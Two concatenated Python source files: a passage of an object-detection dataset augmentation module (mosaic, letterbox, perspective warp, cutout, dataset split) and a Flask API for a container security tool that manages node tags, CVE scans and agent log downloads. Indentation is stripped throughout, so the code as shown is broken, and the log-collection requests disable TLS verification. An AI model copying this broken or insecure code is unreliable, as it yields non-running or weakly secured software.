indices = [index] + [self.indices[random.randint(0, self.n - 1)] for _ in range(8)] # 8 additional image indices
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img9
if i == 0: # center
            img9 = np.full((s * 3, s * 3, img.shape[2]), 114, dtype=np.uint8)  # base image with 9 tiles
h0, w0 = h, w
c = s, s, s + w, s + h # xmin, ymin, xmax, ymax (base) coordinates
elif i == 1: # top
c = s, s - h, s + w, s
elif i == 2: # top right
c = s + wp, s - h, s + wp + w, s
elif i == 3: # right
c = s + w0, s, s + w0 + w, s + h
elif i == 4: # bottom right
c = s + w0, s + hp, s + w0 + w, s + hp + h
elif i == 5: # bottom
c = s + w0 - w, s + h0, s + w0, s + h0 + h
elif i == 6: # bottom left
c = s + w0 - wp - w, s + h0, s + w0 - wp, s + h0 + h
elif i == 7: # left
c = s - w, s + h0 - h, s, s + h0
elif i == 8: # top left
c = s - w, s + h0 - hp - h, s, s + h0 - hp
padx, pady = c[:2]
x1, y1, x2, y2 = [max(x, 0) for x in c] # allocate coords
# Labels
labels = self.labels[index].copy()
if labels.size:
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], w, h, padx, pady) # normalized xywh to pixel xyxy format
labels9.append(labels)
# Image
img9[y1:y2, x1:x2] = img[y1 - pady:, x1 - padx:] # img9[ymin:ymax, xmin:xmax]
hp, wp = h, w # height, width previous
# Offset
yc, xc = [int(random.uniform(0, s)) for x in self.mosaic_border] # mosaic center x, y
img9 = img9[yc:yc + 2 * s, xc:xc + 2 * s]
# Concat/clip labels
if len(labels9):
labels9 = np.concatenate(labels9, 0)
labels9[:, [1, 3]] -= xc
labels9[:, [2, 4]] -= yc
np.clip(labels9[:, 1:], 0, 2 * s, out=labels9[:, 1:]) # use with random_perspective
# img9, labels9 = replicate(img9, labels9) # replicate
# Augment
img9, labels9 = random_perspective(img9, labels9,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img9, labels9
def replicate(img, labels):
# Replicate labels
h, w = img.shape[:2]
boxes = labels[:, 1:].astype(int)
x1, y1, x2, y2 = boxes.T
s = ((x2 - x1) + (y2 - y1)) / 2 # side length (pixels)
for i in s.argsort()[:round(s.size * 0.5)]: # smallest indices
x1b, y1b, x2b, y2b = boxes[i]
bh, bw = y2b - y1b, x2b - x1b
yc, xc = int(random.uniform(0, h - bh)), int(random.uniform(0, w - bw)) # offset x, y
x1a, y1a, x2a, y2a = [xc, yc, xc + bw, yc + bh]
img[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
labels = np.append(labels, [[labels[i, 0], x1a, y1a, x2a, y2a]], axis=0)
return img, labels
def letterbox(img, new_shape=(640, 640), color=(114, 114, 114), auto=True, scaleFill=False, scaleup=True):
# Resize image to a 32-pixel-multiple rectangle https://github.com/ultralytics/yolov3/issues/232
shape = img.shape[:2] # current shape [height, width]
if isinstance(new_shape, int):
new_shape = (new_shape, new_shape)
# Scale ratio (new / old)
r = min(new_shape[0] / shape[0], new_shape[1] / shape[1])
if not scaleup: # only scale down, do not scale up (for better test mAP)
r = min(r, 1.0)
# Compute padding
ratio = r, r # width, height ratios
new_unpad = int(round(shape[1] * r)), int(round(shape[0] * r))
dw, dh = new_shape[1] - new_unpad[0], new_shape[0] - new_unpad[1] # wh padding
if auto: # minimum rectangle
dw, dh = np.mod(dw, 32), np.mod(dh, 32) # wh padding
elif scaleFill: # stretch
dw, dh = 0.0, 0.0
new_unpad = (new_shape[1], new_shape[0])
ratio = new_shape[1] / shape[1], new_shape[0] / shape[0] # width, height ratios
dw /= 2 # divide padding into 2 sides
dh /= 2
if shape[::-1] != new_unpad: # resize
img = cv2.resize(img, new_unpad, interpolation=cv2.INTER_LINEAR)
top, bottom = int(round(dh - 0.1)), int(round(dh + 0.1))
left, right = int(round(dw - 0.1)), int(round(dw + 0.1))
img = cv2.copyMakeBorder(img, top, bottom, left, right, cv2.BORDER_CONSTANT, value=color) # add border
return img, ratio, (dw, dh)
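# Worked example (illustrative): a 720x1280 (h x w) frame letterboxed to new_shape=640
# with auto=True gives r = 0.5, new_unpad = (640, 360), wh padding (0, 280) reduced
# modulo 32 to (0, 24); the image is therefore resized to 640x360 and padded with 12 px
# of gray (114, 114, 114) on top and bottom, returning a 384x640 image, ratio (0.5, 0.5)
# and padding (0.0, 12.0).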
def random_perspective(img, targets=(), degrees=10, translate=.1, scale=.1, shear=10, perspective=0.0, border=(0, 0)):
# torchvision.transforms.RandomAffine(degrees=(-10, 10), translate=(.1, .1), scale=(.9, 1.1), shear=(-10, 10))
# targets = [cls, xyxy]
height = img.shape[0] + border[0] * 2 # shape(h,w,c)
width = img.shape[1] + border[1] * 2
# Center
C = np.eye(3)
C[0, 2] = -img.shape[1] / 2 # x translation (pixels)
C[1, 2] = -img.shape[0] / 2 # y translation (pixels)
# Perspective
P = np.eye(3)
P[2, 0] = random.uniform(-perspective, perspective) # x perspective (about y)
P[2, 1] = random.uniform(-perspective, perspective) # y perspective (about x)
# Rotation and Scale
R = np.eye(3)
a = random.uniform(-degrees, degrees)
# a += random.choice([-180, -90, 0, 90]) # add 90deg rotations to small rotations
s = random.uniform(1 - scale, 1 + scale)
# s = 2 ** random.uniform(-scale, scale)
R[:2] = cv2.getRotationMatrix2D(angle=a, center=(0, 0), scale=s)
# Shear
S = np.eye(3)
S[0, 1] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # x shear (deg)
S[1, 0] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # y shear (deg)
# Translation
T = np.eye(3)
T[0, 2] = random.uniform(0.5 - translate, 0.5 + translate) * width # x translation (pixels)
T[1, 2] = random.uniform(0.5 - translate, 0.5 + translate) * height # y translation (pixels)
# Combined rotation matrix
M = T @ S @ R @ P @ C # order of operations (right to left) is IMPORTANT
if (border[0] != 0) or (border[1] != 0) or (M != np.eye(3)).any(): # image changed
if perspective:
img = cv2.warpPerspective(img, M, dsize=(width, height), borderValue=(114, 114, 114))
else: # affine
img = cv2.warpAffine(img, M[:2], dsize=(width, height), borderValue=(114, 114, 114))
# Visualize
# import matplotlib.pyplot as plt
# ax = plt.subplots(1, 2, figsize=(12, 6))[1].ravel()
# ax[0].imshow(img[:, :, ::-1]) # base
# ax[1].imshow(img2[:, :, ::-1]) # warped
# Transform label coordinates
n = len(targets)
if n:
# warp points
xy = np.ones((n * 4, 3))
xy[:, :2] = targets[:, [1, 2, 3, 4, 1, 4, 3, 2]].reshape(n * 4, 2) # x1y1, x2y2, x1y2, x2y1
xy = xy @ M.T # transform
if perspective:
xy = (xy[:, :2] / xy[:, 2:3]).reshape(n, 8) # rescale
else: # affine
xy = xy[:, :2].reshape(n, 8)
# create new boxes
x = xy[:, [0, 2, 4, 6]]
y = xy[:, [1, 3, 5, 7]]
xy = np.concatenate((x.min(1), y.min(1), x.max(1), y.max(1))).reshape(4, n).T
# # apply angle-based reduction of bounding boxes
# radians = a * math.pi / 180
# reduction = max(abs(math.sin(radians)), abs(math.cos(radians))) ** 0.5
# x = (xy[:, 2] + xy[:, 0]) / 2
# y = (xy[:, 3] + xy[:, 1]) / 2
# w = (xy[:, 2] - xy[:, 0]) * reduction
# h = (xy[:, 3] - xy[:, 1]) * reduction
# xy = np.concatenate((x - w / 2, y - h / 2, x + w / 2, y + h / 2)).reshape(4, n).T
# clip boxes
xy[:, [0, 2]] = xy[:, [0, 2]].clip(0, width)
xy[:, [1, 3]] = xy[:, [1, 3]].clip(0, height)
# filter candidates
i = box_candidates(box1=targets[:, 1:5].T * s, box2=xy.T)
targets = targets[i]
targets[:, 1:5] = xy[i]
return img, targets
def box_candidates(box1, box2, wh_thr=2, ar_thr=20, area_thr=0.1, eps=1e-16): # box1(4,n), box2(4,n)
# Compute candidate boxes: box1 before augment, box2 after augment, wh_thr (pixels), aspect_ratio_thr, area_ratio
w1, h1 = box1[2] - box1[0], box1[3] - box1[1]
w2, h2 = box2[2] - box2[0], box2[3] - box2[1]
ar = np.maximum(w2 / (h2 + eps), h2 / (w2 + eps)) # aspect ratio
return (w2 > wh_thr) & (h2 > wh_thr) & (w2 * h2 / (w1 * h1 + eps) > area_thr) & (ar < ar_thr) # candidates
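# Example (illustrative): a 100x100 px box that collapses to 3x50 px after warping
# passes the wh_thr and ar_thr checks but fails the area-ratio check
# (3 * 50 / (100 * 100) = 0.015 < 0.1), so the corresponding target is dropped.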
def cutout(image, labels):
# Applies image cutout augmentation https://arxiv.org/abs/1708.04552
h, w = image.shape[:2]
def bbox_ioa(box1, box2):
# Returns the intersection over box2 area given box1, box2. box1 is 4, box2 is nx4. boxes are x1y1x2y2
box2 = box2.transpose()
# Get the coordinates of bounding boxes
b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3]
b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3]
# Intersection area
inter_area = (np.minimum(b1_x2, b2_x2) - np.maximum(b1_x1, b2_x1)).clip(0) * \
(np.minimum(b1_y2, b2_y2) - np.maximum(b1_y1, b2_y1)).clip(0)
# box2 area
box2_area = (b2_x2 - b2_x1) * (b2_y2 - b2_y1) + 1e-16
# Intersection over box2 area
return inter_area / box2_area
# create random masks
scales = [0.5] * 1 + [0.25] * 2 + [0.125] * 4 + [0.0625] * 8 + [0.03125] * 16 # image size fraction
for s in scales:
mask_h = random.randint(1, int(h * s))
mask_w = random.randint(1, int(w * s))
# box
xmin = max(0, random.randint(0, w) - mask_w // 2)
ymin = max(0, random.randint(0, h) - mask_h // 2)
xmax = min(w, xmin + mask_w)
ymax = min(h, ymin + mask_h)
# apply random color mask
image[ymin:ymax, xmin:xmax] = [random.randint(64, 191) for _ in range(3)]
# return unobscured labels
if len(labels) and s > 0.03:
box = np.array([xmin, ymin, xmax, ymax], dtype=np.float32)
ioa = bbox_ioa(box, labels[:, 1:5]) # intersection over area
labels = labels[ioa < 0.60] # remove >60% obscured labels
return labels
def create_folder(path='./new'):
# Create folder
if os.path.exists(path):
shutil.rmtree(path) # delete output folder
os.makedirs(path) # make new output folder
def flatten_recursive(path='../coco128'):
# Flatten a recursive directory by bringing all files to top level
new_path = Path(path + '_flat')
create_folder(new_path)
for file in tqdm(glob.glob(str(Path(path)) + '/**/*.*', recursive=True)):
shutil.copyfile(file, new_path / Path(file).name)
def extract_boxes(path='../coco128/'): # from utils.datasets import *; extract_boxes('../coco128')
# Convert detection dataset into classification dataset, with one directory per class
path = Path(path) # images dir
shutil.rmtree(path / 'classifier') if (path / 'classifier').is_dir() else None # remove existing
files = list(path.rglob('*.*'))
n = len(files) # number of files
for im_file in tqdm(files, total=n):
if im_file.suffix[1:] in img_formats:
# image
im = cv2.imread(str(im_file))[..., ::-1] # BGR to RGB
h, w = im.shape[:2]
# labels
lb_file = Path(img2label_paths([str(im_file)])[0])
if Path(lb_file).exists():
with open(lb_file, 'r') as f:
lb = np.array([x.split() for x in f.read().strip().splitlines()], dtype=np.float32) # labels
for j, x in enumerate(lb):
c = int(x[0]) # class
f = (path / 'classifier') / f'{c}' / f'{path.stem}_{im_file.stem}_{j}.jpg' # new filename
if not f.parent.is_dir():
f.parent.mkdir(parents=True)
b = x[1:] * [w, h, w, h] # box
# b[2:] = b[2:].max() # rectangle to square
b[2:] = b[2:] * 1.2 + 3 # pad
b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(np.int)
b[[0, 2]] = np.clip(b[[0, 2]], 0, w) # clip boxes outside of image
b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
assert cv2.imwrite(str(f), im[b[1]:b[3], b[0]:b[2]]), f'box failure in {f}'
def autosplit(path='../coco128', weights=(0.9, 0.1, 0.0)): # from utils.datasets import *; autosplit('../coco128')
""" Autosplit a dataset into train/val/test splits and save path/autosplit_*.txt files
# Arguments
path: Path to images directory
weights: Train, val, test weights (list)
"""
path = Path(path) # images dir
files = list(path.rglob('*.*'))
n = len(files) # number of files
indices = random.choices([0, 1, 2], weights=weights, k=n) # assign each image to a split
txt = ['autosplit_train.txt', 'autosplit_val.txt', 'autosplit_test.txt'] # 3 txt files
[(path / x).unlink() for x in txt if (path / x).exists()] # remove existing
for i, img in tqdm(zip(indices, files), total=n):
if img.suffix[1:] in img_formats:
with open(path / txt[i], 'a') as f:
f.write(str(img) + '\n') # add image to txt file
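# Usage sketch (illustrative): autosplit('../coco128', weights=(0.9, 0.1, 0.0)) writes
# autosplit_train.txt, autosplit_val.txt and autosplit_test.txt next to the images,
# each listing the image paths randomly assigned to that split.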
|
resource_api.py
|
from flask import Blueprint, request
from flask_jwt_extended import jwt_required, get_jwt_identity
from models.node_tags import NodeTags
from models.scheduler import Scheduler
from models.container_image_registry import RegistryCredential
from models.user import User, Role
from flask import current_app
from utils.response import set_response
from utils.decorators import non_read_only_user, admin_user_only
from utils.custom_exception import InternalError, InvalidUsage, DFError, Forbidden
from utils.helper import websocketio_channel_name_format, get_random_string, mkdir_recursive, rmdir_recursive
import json
from utils import resource
from resource_models.node import Node
from utils import constants
from croniter import croniter
from utils.esconn import ESConn
from utils.constants import ES_TERMS_AGGR_SIZE
import urllib.parse
import requests
from config.redisconfig import redis
import subprocess
import os
from copy import deepcopy
from flask import send_from_directory
import multiprocessing
from utils.node_utils import NodeUtils
import time
import eventlet
resource_api = Blueprint("resource_api", __name__)
@resource_api.route("/node/<path:node_id>/" + constants.NODE_ACTION_ADD_TAGS, methods=["POST"],
endpoint="api_v1_5_add_tags")
@jwt_required
@non_read_only_user
def add_tags(node_id):
"""
Node Control API - Add User Defined Tags
---
tags:
- Node Control
security:
- Bearer: []
operationId: addUserDefinedTags
description: Add given tags to this node (Applicable node type - `host`, `container`, `container_image`)
parameters:
- in: path
name: node_id
description: Node ID (refer enumerate api)
type: string
- in: body
name: Options
description: Add tags to this node for easy identification
schema:
type: object
properties:
user_defined_tags:
type: array
example: [prod, dev]
uniqueItems: true
default: []
description: Add tags to this node for easy identification
items:
type: string
example: dev
responses:
200:
description: Request success
properties:
data:
type: string
description: Response message
error:
type: string
description: Error message, if any. Otherwise `null`
success:
type: boolean
description: Success status
enum: [true, false]
400:
description: Bad request
401:
description: Unauthorized
"""
try:
if not request.is_json:
raise InvalidUsage("Missing JSON post data in request")
node = Node.get_node(node_id, request.args.get("scope_id", None), request.args.get("node_type", None))
if node.type == constants.NODE_TYPE_HOST or node.type == constants.NODE_TYPE_CONTAINER or \
node.type == constants.NODE_TYPE_CONTAINER_IMAGE:
post_data = request.json
if not post_data:
post_data = {}
tags = post_data.get('user_defined_tags', [])
if type(tags) != list:
raise InvalidUsage("user_defined_tags must be of list type")
tmp_tags = []
for tag in tags:
if tag:
tmp_tags.append(tag)
tags = tmp_tags
if not tags:
raise InvalidUsage("user_defined_tags must be of list type")
set_node_tags_in_db(node, tags, "add_tags")
return set_response(data=node.set_tags(tags, "add_user_defined_tags"))
else:
raise InvalidUsage(
"Control '{0}' not applicable for node type '{1}'".format(constants.NODE_ACTION_ADD_TAGS, node.type))
except DFError as err:
current_app.logger.error("NodeView: action={}; error={}".format(constants.NODE_ACTION_ADD_TAGS, err))
raise InvalidUsage(err.message)
except Exception as ex:
raise InternalError(str(ex))
def set_node_tags_in_db(node, tags, action):
node_name = ""
present_tags = []
node_tag = None
node_tags_list = []
image_parent_host_names = []
if node.type == constants.NODE_TYPE_HOST:
node_name = node.host_name
node_tag = NodeTags.query.filter_by(host_name=node.host_name, node_name=node_name,
node_type=node.type).one_or_none()
if node_tag:
present_tags = str(node_tag.tags).split(",")
if node.type == constants.NODE_TYPE_CONTAINER:
node_name = node.docker_container_id
node_tag = NodeTags.query.filter_by(host_name=node.host_name, node_name=node_name,
node_type=node.type).one_or_none()
if node_tag:
present_tags = str(node_tag.tags).split(",")
elif node.type == constants.NODE_TYPE_CONTAINER_IMAGE:
node_name = node.image_name_tag
for parent in node.node_details_formatted.get("parents", []):
if parent.get("type", "") == constants.NODE_TYPE_HOST and parent.get("label", ""):
image_parent_host_names.append(parent["label"])
node_tags_list = NodeTags.query.filter(NodeTags.host_name.in_(image_parent_host_names),
NodeTags.node_name == node_name, NodeTags.node_type == node.type).all()
if node_tags_list:
present_tags = str(node_tags_list[0].tags).split(",")
if action == "add_tags":
present_tags.extend(tags)
present_tags = list(set(present_tags))
elif action == "delete_tags":
for tag in tags:
if tag in present_tags:
present_tags.remove(tag)
if present_tags:
if node.type == constants.NODE_TYPE_HOST or node.type == constants.NODE_TYPE_CONTAINER:
if not node_tag:
node_tag = NodeTags(host_name=node.host_name, node_name=node_name, node_type=node.type)
node_tag.tags = ",".join(present_tags)
node_tag.save()
elif node.type == constants.NODE_TYPE_CONTAINER_IMAGE:
host_node_tag_map = {node_tag.host_name: node_tag for node_tag in node_tags_list}
for parent_host_name in image_parent_host_names:
if parent_host_name in host_node_tag_map:
node_tag = host_node_tag_map[parent_host_name]
node_tag.tags = ",".join(present_tags)
node_tag.save()
else:
node_tag = NodeTags(host_name=parent_host_name, node_name=node_name, node_type=node.type)
node_tag.tags = ",".join(present_tags)
node_tag.save()
else:
if node_tag:
node_tag.delete()
if node_tags_list:
for node_tag in node_tags_list:
node_tag.delete()
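# Note (illustrative): tags are persisted per (host_name, node_name, node_type) row as a
# single comma-joined string, e.g. ["prod", "dev"] is stored in NodeTags.tags as
# "prod,dev"; an "add_tags" action unions with the existing set, while "delete_tags"
# removes matches and deletes the row entirely when no tags remain.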
@resource_api.route("/node/<path:node_id>/" + constants.NODE_ACTION_DELETE_TAGS, methods=["POST"],
endpoint="api_v1_5_delete_tags")
@jwt_required
@non_read_only_user
def delete_tags(node_id):
"""
Node Control API - Delete User Defined Tags
---
tags:
- Node Control
security:
- Bearer: []
operationId: deleteUserDefinedTags
description: Delete given tags from this node (Applicable node type - `host`, `container`, `container_image`)
parameters:
- in: path
name: node_id
description: Node ID (refer enumerate api)
type: string
- in: body
name: Options
description: Delete given tags from this node
schema:
type: object
properties:
user_defined_tags:
type: array
example: [prod, dev]
uniqueItems: true
default: []
description: Delete given tags from this node
items:
type: string
example: dev
responses:
200:
description: Request success
properties:
data:
type: string
description: Response message
error:
type: string
description: Error message, if any. Otherwise `null`
success:
type: boolean
description: Success status
enum: [true, false]
400:
description: Bad request
401:
description: Unauthorized
"""
try:
if not request.is_json:
raise InvalidUsage("Missing JSON post data in request")
node = Node.get_node(node_id, request.args.get("scope_id", None), request.args.get("node_type", None))
if node.type == constants.NODE_TYPE_HOST or node.type == constants.NODE_TYPE_CONTAINER or \
node.type == constants.NODE_TYPE_CONTAINER_IMAGE:
post_data = request.json
if not post_data:
post_data = {}
tags = post_data.get('user_defined_tags', [])
if type(tags) != list:
raise InvalidUsage("user_defined_tags must be of list type")
tmp_tags = []
for tag in tags:
if tag:
tmp_tags.append(tag)
tags = tmp_tags
if not tags:
raise InvalidUsage("user_defined_tags must be of list type")
set_node_tags_in_db(node, tags, "delete_tags")
return set_response(data=node.set_tags(tags, "delete_user_defined_tags"))
else:
raise InvalidUsage(
"Control '{0}' not applicable for node type '{1}'".format(constants.NODE_ACTION_DELETE_TAGS, node.type))
except DFError as err:
current_app.logger.error("NodeView: action={}; error={}".format(constants.NODE_ACTION_DELETE_TAGS, err))
raise InvalidUsage(err.message)
except Exception as ex:
raise InternalError(str(ex))
@resource_api.route("/node/<path:node_id>/" + constants.NODE_ACTION_CVE_SCAN_START, methods=["POST"],
endpoint="api_v1_5_start_cve")
@jwt_required
@non_read_only_user
def start_cve(node_id):
"""
Node Control API - Start CVE
---
tags:
- Vulnerability Management
security:
- Bearer: []
operationId: startCVE
description: Start CVE on a node (Applicable node type - `host`, `container`, `container_image`)
parameters:
- in: path
name: node_id
description: Node ID (refer enumerate api)
type: string
- in: body
name: Options
description: Options to start cve
schema:
type: object
properties:
scan_type:
type: array
uniqueItems: true
description: Base and language specific scan types
example: ["base"]
items:
type: string
enum: [base, java, python, ruby, php, nodejs, js, dotnet]
responses:
200:
description: Request success
properties:
data:
type: string
description: Response message
error:
type: string
description: Error message, if any. Otherwise `null`
success:
type: boolean
description: Success status
enum: [true, false]
400:
description: Bad request
401:
description: Unauthorized
"""
try:
post_data = {}
if request.is_json:
post_data = request.json
node = Node.get_node(node_id, request.args.get("scope_id", None), request.args.get("node_type", None))
if not node:
raise InvalidUsage("Node not found")
if node.type == constants.NODE_TYPE_HOST or node.type == constants.NODE_TYPE_CONTAINER or node.type == constants.NODE_TYPE_CONTAINER_IMAGE:
scan_types = post_data.get("scan_type", None)
if not scan_types or type(scan_types) != list:
scan_types = constants.CVE_SCAN_TYPES
else:
scan_types = list(set(scan_types + ["base"]) & set(constants.CVE_SCAN_TYPES))
scan_this_cluster = bool(post_data.get("scan_this_cluster", False))
scan_this_namespace = bool(post_data.get("scan_this_namespace", False))
mask_cve_ids = post_data.get("mask_cve_ids", [])
if scan_this_cluster:
if node.type not in [constants.NODE_TYPE_HOST, constants.NODE_TYPE_CONTAINER]:
raise InvalidUsage("scan_this_cluster option available for images")
if not node.kubernetes_cluster_id:
raise InvalidUsage("scan_this_cluster option available only in kubernetes nodes")
if scan_this_namespace:
if node.type != constants.NODE_TYPE_CONTAINER:
raise InvalidUsage("scan_this_namespace option available for for containers only")
if not node.kubernetes_cluster_id:
raise InvalidUsage("scan_this_cluster option available only in kubernetes nodes")
# action/event/resources/success
node_json = node.pretty_print()
resources = [{
"scan_types": scan_types,
node_json["node_type"]: node_json,
}]
from tasks.user_activity import create_user_activity
jwt_identity = get_jwt_identity()
create_user_activity.delay(jwt_identity["id"], constants.ACTION_START, constants.EVENT_VULNERABILITY_SCAN,
resources=resources, success=True)
df_id_to_scope_id_map = {}
topology_hosts_data = {}
topology_containers_data = {}
from config.redisconfig import redis
if scan_this_cluster or scan_this_namespace:
redis_pipe = redis.pipeline()
redis_pipe.hgetall(constants.DF_ID_TO_SCOPE_ID_REDIS_KEY_PREFIX + node.type.upper())
redis_pipe.get(websocketio_channel_name_format(constants.NODE_TYPE_HOST + "?format=deepfence")[1])
redis_pipe.get(websocketio_channel_name_format(constants.NODE_TYPE_CONTAINER + "?format=deepfence")[1])
redis_resp = redis_pipe.execute()
df_id_to_scope_id_map = redis_resp[0]
if redis_resp[1]:
topology_hosts_data = json.loads(redis_resp[1])
if redis_resp[2]:
topology_containers_data = json.loads(redis_resp[2])
if scan_this_cluster:
node_list = []
redis_lock_keys = []
redis_pipe = redis.pipeline()
# Scan all hosts in the cluster
for host_node_id, host_details in topology_hosts_data.items():
if host_details.get("kubernetes_cluster_id") == node.kubernetes_cluster_id:
try:
host_node = Node(host_node_id, df_id_to_scope_id_map=df_id_to_scope_id_map,
topology_data_df_format=topology_hosts_data)
lock_key = "{0}:{1}".format(constants.NODE_ACTION_CVE_SCAN_START, host_node.host_name)
redis_pipe.incr(lock_key)
node_list.append(host_node)
redis_lock_keys.append(lock_key)
except:
pass
# Scan all container images in the cluster
image_scan_started = []
for container_node_id, container_details in topology_containers_data.items():
if container_details.get("kubernetes_cluster_id") == node.kubernetes_cluster_id \
and container_details.get("image_name_with_tag"):
if container_details["image_name_with_tag"] in image_scan_started:
continue
try:
container_node = Node(container_node_id, df_id_to_scope_id_map=df_id_to_scope_id_map,
topology_data_df_format=topology_containers_data)
lock_key = "{0}:{1}".format(constants.NODE_ACTION_CVE_SCAN_START,
container_node.image_name_tag)
redis_pipe.incr(lock_key)
node_list.append(container_node)
redis_lock_keys.append(lock_key)
image_scan_started.append(container_details["image_name_with_tag"])
except:
pass
redis_resp = redis_pipe.execute()
for i, tmp_node in enumerate(node_list):
if redis_resp[i] != 1:
continue
try:
tmp_node.cve_scan_start(scan_types)
except:
continue
time.sleep(1)
redis_pipe = redis.pipeline()
for lock_key in redis_lock_keys:
                    redis_pipe.delete(lock_key)
redis_pipe.execute()
return set_response(data=True)
elif scan_this_namespace:
node_list = []
redis_lock_keys = []
redis_pipe = redis.pipeline()
image_scan_started = []
current_namespace = node.container_name.split("/")[0]
for container_node_id, container_details in topology_containers_data.items():
if container_details.get("kubernetes_cluster_id") == node.kubernetes_cluster_id \
and container_details.get("image_name_with_tag") \
and container_details.get("container_name"):
if container_details["image_name_with_tag"] in image_scan_started:
continue
k8s_namespace = container_details["container_name"].split("/")[0]
if k8s_namespace != current_namespace:
continue
try:
container_node = Node(container_node_id, df_id_to_scope_id_map=df_id_to_scope_id_map,
topology_data_df_format=topology_containers_data)
lock_key = "{0}:{1}".format(constants.NODE_ACTION_CVE_SCAN_START,
container_node.image_name_tag)
redis_pipe.incr(lock_key)
node_list.append(container_node)
redis_lock_keys.append(lock_key)
image_scan_started.append(container_details["image_name_with_tag"])
except:
pass
redis_resp = redis_pipe.execute()
for i, tmp_node in enumerate(node_list):
if redis_resp[i] != 1:
continue
try:
tmp_node.cve_scan_start(scan_types)
except:
continue
time.sleep(1)
redis_pipe = redis.pipeline()
for lock_key in redis_lock_keys:
                    redis_pipe.delete(lock_key)
redis_pipe.execute()
return set_response(data=True)
else:
lock_key = ""
if node.type == constants.NODE_TYPE_HOST:
lock_key = "{0}:{1}".format(constants.NODE_ACTION_CVE_SCAN_START, node.host_name)
else:
lock_key = "{0}:{1}".format(constants.NODE_ACTION_CVE_SCAN_START, node.image_name_tag)
redis_resp = redis.incr(lock_key)
if redis_resp != 1:
raise DFError("CVE scan on this node is already in progress")
resp = False
try:
resp = node.cve_scan_start(scan_types, ",".join(mask_cve_ids))
except Exception as ex:
redis.delete(lock_key)
raise ex
time.sleep(1)
redis.delete(lock_key)
return set_response(data=resp)
else:
raise InvalidUsage(
"Control '{0}' not applicable for node type '{1}'".format(constants.NODE_ACTION_CVE_SCAN_START,
node.type))
except DFError as err:
current_app.logger.error("NodeView: action={}; error={}".format(constants.NODE_ACTION_CVE_SCAN_START, err))
raise InvalidUsage(err.message)
except Exception as ex:
# import traceback
# track = traceback.format_exc()
# print(track)
raise InternalError(str(ex))
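# Example request body (illustrative) for the start CVE scan endpoint above:
#   {"scan_type": ["base", "java"], "scan_this_cluster": false, "mask_cve_ids": []}
# Requested scan types are intersected with constants.CVE_SCAN_TYPES and "base" is
# always included.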
@resource_api.route("/get_logs", methods=["POST"], endpoint="api_v1_5_get_logs_from_agents")
@jwt_required
@admin_user_only
def get_logs_from_agents():
"""
API to get the agent logs
"""
payloads = request.json
node_id_list = payloads.get('node_id_list', None)
if not node_id_list:
raise InvalidUsage("node_id_list must not be empty")
if type(node_id_list) != list:
raise InvalidUsage("node_id_list must be list of node ids")
node_type = payloads.get('node_type', None)
if node_type != "host":
raise InvalidUsage("node_type must be host")
topology_data_df_format = {}
try:
redis_pipe = redis.pipeline()
redis_pipe.hgetall(constants.DF_ID_TO_SCOPE_ID_REDIS_KEY_PREFIX + node_type.upper())
redis_pipe.get(websocketio_channel_name_format(node_type + "?format=deepfence")[1])
redis_resp = redis_pipe.execute()
df_id_to_scope_id_map = redis_resp[0]
if redis_resp[1]:
topology_data_df_format = json.loads(redis_resp[1])
if not topology_data_df_format:
raise DFError("No agents data available")
except Exception as e:
raise InvalidUsage(e)
random_string = get_random_string(10)
download_path = os.path.join("/tmp/deepfence-logs-download", random_string)
mkdir_recursive(download_path)
zip_path = os.path.join("/tmp/deepfence-logs", random_string)
mkdir_recursive(zip_path)
def get_logs_from_agents_task(node_id):
try:
eventlet.monkey_patch()
node = Node(node_id, df_id_to_scope_id_map=df_id_to_scope_id_map,
topology_data_df_format=topology_data_df_format)
applicable_scans_api_url = constants.SCOPE_HOST_API_CONTROL_URL.format(
probe_id=node.probe_id, host_name=node.host_name, action="get_logs_from_agent")
with eventlet.Timeout(10):
resp = requests.post(applicable_scans_api_url, data='{}', verify=False)
response_data = resp.json()
if resp.status_code != 200:
raise InvalidUsage("Error: could not get logs from agent")
for single_file_info in response_data["agent_logs"]:
host_download_path = os.path.join(download_path, node.host_name)
mkdir_recursive(host_download_path)
f = open(os.path.join(host_download_path, single_file_info["file_name"]), "w+")
f.write(single_file_info["data"])
f.close()
except:
pass
processes = []
num_of_thread = 20
def chunks(l, n):
for i in range(0, len(l), n):
yield l[i:i + n]
for node_id in node_id_list:
p = multiprocessing.Process(target=get_logs_from_agents_task, args=(node_id,))
processes.append(p)
try:
for i in chunks(processes, num_of_thread):
for j in i:
j.start()
for j in i:
j.join()
except Exception as e:
raise InvalidUsage(e)
if not os.listdir(download_path):
raise InvalidUsage("logs has not been generated")
subprocess.run("tar -C {0} -zcvf {1}/deepfence-agent-logs.tar.gz .".format(download_path, zip_path), shell=True)
rmdir_recursive(download_path)
# from tasks.reaper_tasks import delete_old_agent_logs
# delete_old_agent_logs.delay(zip_path)
return send_from_directory(zip_path, filename="deepfence-agent-logs.tar.gz", as_attachment=True), 200
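# Example request body (illustrative) for /get_logs:
#   {"node_id_list": ["<node_id_1>", "<node_id_2>"], "node_type": "host"}
# The response is a deepfence-agent-logs.tar.gz attachment containing one folder of log
# files per host.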
@resource_api.route("/node/<path:node_id>/" + constants.NODE_ACTION_CVE_SCAN_STOP, methods=["POST"],
endpoint="api_v1_5_stop_cve")
@jwt_required
@non_read_only_user
def stop_cve(node_id):
"""
Node Control API - Stop CVE
---
tags:
- Vulnerability Management
security:
- Bearer: []
operationId: stopCVE
description: Stop CVE on a node (Applicable node type - `host`, `container`, `container_image`)
parameters:
- in: path
name: node_id
description: Node ID (refer enumerate api)
type: string
responses:
200:
description: Request success
properties:
data:
type: string
description: Response message
error:
type: string
description: Error message, if any. Otherwise `null`
success:
type: boolean
description: Success status
enum: [true, false]
400:
description: Bad request
401:
description: Unauthorized
"""
try:
node = Node.get_node(node_id, request.args.get("scope_id", None), request.args.get("node_type", None))
if not node:
